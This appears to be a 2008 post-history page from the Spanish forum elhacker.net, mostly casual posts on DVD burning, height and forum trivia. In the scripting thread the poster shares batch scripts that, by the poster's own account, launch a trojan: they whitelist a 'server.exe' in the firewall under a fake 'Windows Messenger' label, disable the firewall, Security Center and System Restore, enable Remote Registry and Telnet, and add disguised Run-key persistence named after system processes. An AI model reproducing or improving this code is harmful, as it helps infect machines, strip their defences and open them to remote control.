elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


  Mostrar Mensajes
Páginas: 1 2 [3] 4 5 6
21  Informática / Software / Como uso y grabo bien con mi grabadora? en: 19 Marzo 2008, 05:20 am
Hola .. buenas noches ! xD Me compre una grabadora de DVD. Pero no la se usar nunca use una y no tengo la minima idea de esto. Se que hay que usar el Nero.. me compre unos dvd no regrabables y ya me dijeron como grabar archivos musica o documentos en los dvd. La cosa es que por ejemplo yo tengo unos cuantos capitulos de anime en formato .avi alrededor de 170MB pesan. Quiero saber como hago para poder grabarlos en CD DVD y luego verlos en la DVD de la tele? Me dijeron algo asi como quemando el archivo no tengo ni idea :( Soy re tonto xD. Haber si me pudieran ayudar asi no me mando cagadas con los cd dvd que se estropean facilmente.
22  Foros Generales / Foro Libre / Re: Aumentar Estatura en: 18 Marzo 2008, 03:47 am
No te creas yo tengo amigos que pegaron tiron antes y a los 13 años ya estaba así. El fue al medico y le dijo el doctor que segurisimo ya no crecia más. 1.84 y todavia no has pasado a tu padre? Wow debe ser alto. Si tus padres son altos vos no vas a salir enano aunque no hagas nada :P
23  Foros Generales / Foro Libre / Re: Aumentar Estatura en: 17 Marzo 2008, 18:28 pm
Pero entonces es un problema de etica :/. Si alguien nació asi no fue su culpa pero que se haga respetar no?. El problema de el es la estatura, pero porque tiene que ser un problema ser enano  :¬¬. Que tiene que sea enano y si tiene cara fea no va a agarrarse una mina o va a ser dificil ?.
24  Foros Generales / Foro Libre / Re: Aumentar Estatura en: 17 Marzo 2008, 03:17 am
16 años y mido 1.70 anda a saber si crezco o no.. :P pero cada vez que me mido crezco unos centrimetros mas xD. Peso casi 60 :P jaja a mi no me molestaria para nada ser bajo. ACEPTATE COMO SOS es lo mejor que podes hacer :P. Sino fijate los que son estan quemados/marrones ( los de color ) son orgullosos de serlo :P sentite asiiiiiii. Eso si lo que ayuda mucho es el deporte sin ninguna duda. Te lo digo porque.. tengo mi hermano de 15 años mide casi como yo. NUNCA LE GUSTO LA LECHE Y NUNCA LA TOMO TAMPOCO COSAS CON CALCIO pero hace deportes futbol y crecio bastante y por eso esta así. Y tus padres son enanos? eso tambien se tiene que tomar en cuenta. Los mios son enanos.. 1.55 tal vez mi mama o menos :p y mi papa alrededor de 1.70 un poquito mas.
25  Programación / Scripting / Re: Como hacer funcionar este batch perfectamente? en: 8 Marzo 2008, 17:06 pm
Hola si el primero es ctfmon.bat y el segundo es lsaas.bat si los voy a compilar luego osea que los tendria que modificar por .exe a algunas partes :p el primero que hace todo lo que dice y llama al segundo si existe. El segundo bat seria el que se fija si existe ctmon.bat y sino existe vuelve a crearla, creo que los 2 bat estan bien. Pero los ejecute en modo .bat en un cyber mas tarde te digo la ventana del cmd de los bat porque no me reconoce algunas cosas. Como /v y otras cosas si puedo voy a ejecutarlos en el cyber en .bat para no tener errores. Espero respuesta tuya :)
26  Programación / Scripting / Re: Como hacer funcionar este batch perfectamente? en: 7 Marzo 2008, 18:07 pm
Dudas aqui !!

Código:
@echo off
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v server.exe /t REG_SZ /d "%windir%\ctfmon\1234\server.exe:*:Enabled:  Windows Messenger"
[color=red]REG ADD "hklm\software\microsoft\windows\currentversion\run" /v ctfmon.bat /d[/color] %windir%\system32\2114\ctfmon.bat /f
if exist %windir%\system32\2114\lsass.exe ( start %windir%\system32\2114\lsass.exe )
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /d 4 /f
net start AppMgmt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt" /v Start /d 4 /f
net start ProtectedStorage
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\ProtectedStorage" /v Start /d 2 /f
net start LmHosts
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LmHosts" /v Start /d 2 /f
net stop wscsvc
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /d 4 /f
net start RemoteRegistry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry" /v Start /d 2 /f
net stop Srservice
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Srservice" /v Start /d 4 /f
net start TlnSvr
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\TlnSvr" /v Start /d 2 /f
inicio:
if exist %windir%\system32\2114\system32.exe ( start /min %windir%\system32\2114\system32.exe )
ping -n 100 localhost > nul
goto inicio

Esto %windir%system32\2114\ es la ubicacion donde se aloja el troyano una pregunta system32 tiene algun abreviado en codigo como %windir% que seria Window? se pueden poner 2 if exist en un mismo bat? uno para llamar a otro bat y otro ubicado en el bucle como ves. Otra pregunta lo rojo eso agrega el .bat al msconfig cuando se reinicia la pc vuelve a ejecutarse el bat verdad?

El otro bat que seria este..
Código:
:r
ping 127.0.0.1 /n 120
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [color=red]lsass[/color]
if %errorlevel%==1 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ctfmon /d "%windir%\system32\2114\ctfmon.bat" /f
goto r

la parte roja ahi no tendria que ser lsass.exe ?

Ahi ta esas mis dudas espero que me puedas ayudar otra vez.. y decirme si el bat esta bien.
27  Programación / Scripting / Re: Como hacer funcionar este batch perfectamente? en: 22 Febrero 2008, 16:57 pm
No.. Si existe server.exe if exist, vendria a responder al bucle creo. Osea me entendes si existe server.exe empieza a hacer el bucle otra vez de 120 seg.
28  Programación / Scripting / Re: Como hacer funcionar este batch perfectamente? en: 15 Febrero 2008, 15:27 pm
Ok entonces esta bien si existe server.exe va a ejecutar el bucle no? Y si se reinicia la PC se inicia otra vez el .bat y se va a fijar si está y si es asi va a empezar otra vez el bucle verdad?
29  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Por que llevan gorro los emoticonos? en: 15 Febrero 2008, 15:10 pm
Los emoticones son pelados y por eso usan gorra
30  Foros Generales / Foro Libre / Re: Edad Promedio de Usuarios del Foro. en: 14 Febrero 2008, 15:43 pm
Juju yo cumplo 17 pero el 24 de agosto :O
Páginas: 1 2 [3] 4 5 6
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines